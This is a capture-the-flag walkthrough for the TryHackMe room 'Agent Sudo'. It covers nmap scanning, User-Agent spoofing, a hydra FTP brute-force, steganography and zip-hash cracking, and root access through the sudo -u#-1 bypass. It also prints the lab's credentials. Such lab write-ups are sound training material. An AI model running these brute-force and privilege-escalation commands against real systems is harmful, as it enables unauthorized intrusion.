TryHackMe : Agent Sudo

[Task 2] Enumerate

  1. How many open ports?

Port Scan

nmap -Pn <ip>

High port scan

nmap -Pn -p1000 <ip>

No more ports

Service and OS scan

nmap -A -p 21,22,80 <ip>

Vulnerable scan

nmap --script vuln -p 21,22,80 <ip>

Not much useful

2. How you redirect yourself to a secret page?

Access HTTP site

Viewing source shows nothing.

Using user-agent hint, I think I have to change User-Agent of the request

Intercept with Burp Suite

Change to “R”

Nothing useful

Let’s try from A-Z. I succeeded with “C”.

New hidden page

Seems like C is chris.

3. What is the agent name?
ANS: It’s in #2.

[Task 3] Hash cracking and brute-force

  1. FTP password

Let’s brute-force FTP

Create user list

echo chris > users.txt
echo C >> users.txt
echo c >> users.txt
cat users.txt

Brute-force with hydra

hydra -L users.txt -P rockyou.txt ftp://<ip> -u -F -V

I got the credential “chris:crystal”

Try to login.

ftp <ip>chriscrystal

Succcess!!!

ls

Download all files

get To_agentJ.txtget cute-alien.jpgget cutie.png
cat To_agentJ.txt

Seems like I have to do some thing with the images.

Check with file explorer if it’s a real image.

Get file metadata.

exiftool cute-alien.jpg

Nothing much

View file’s hexcode.

bless cute-alien.jpg

Nothing much.

Try to extract text.

steghide extract -sf cute-alien.jpg

I don’t have any passphrase.

Let’s switch to another file.

Get file metadata.

exiftool cutie.jpg

Nothing much

View file’s hexcode.

bless cute-alien.jpg

There’s a hidden file.

Extract it

foremost cutie.png

I get the zip file as a result. But the file is locked with password.

Crack it with fcrackzip

fcrackzip -u -v -D -p rockyou.txt 00000067.zip

I failed using fcrackzip.

Crack with john.

zip2john 00000067.zip  > zip.hashjohn zip.hashjohn zip.hash --show

“alien”

3. steg password

Unzip the file.

Now I have a text with keyword “QXJlYTUx”

Extract cute-alien.jpg with passphrase “QXJlYTUx”

steghide extract -sf cute-alien.jpg

Failed!!! This “QXJlYTUx” may be encoded.

Decode from base 64 with cyberchef. “Area51”

Extract cute-alien.jpg with passphrase “Area51”

steghide extract -sf cute-alien.jpg

I have message.txt

4. Who is the other agent (in full name)?

cat message.txt

Now I have SSH credential, “james:hackerrules!”

4. SSH password
ANS: It’s in #3.

[Task 4] Capture the user flag

  1. What is the user flag?

Login with SSH

ssh james@<ip>
lscat user_flag.txt

2. What is the incident of the photo called?

Download the file

scp Alien_autospy.jpg james@10.10.205.123:/home/james
exiftool Alien_autospy.jpg

Nothing much

Let’s search with google

Using the hint

roswell new mexico alien foxnews

Since I can’t find exact word, I have to guess the answer

ANS: Roswell ***** autopsy

[Task 5] Privilege escalation

  1. CVE number for the escalation (Format: CVE-xxxx-xxxx)

Search for vulnerable

Verify kernel

uname -a

Not much useful

sudo -l

I can do something with /bin/bash

sudo bash

Failed!!!

Let’s google “(ALL, !root) /bin/bash”.

2. What is the root flag?

Let’s exploit it

sudo -u#-1 /bin/bash

Now I’m root.

cd /rootlscat root.txt

3. (Bonus) Who is Agent R?
ANS: It’s in #2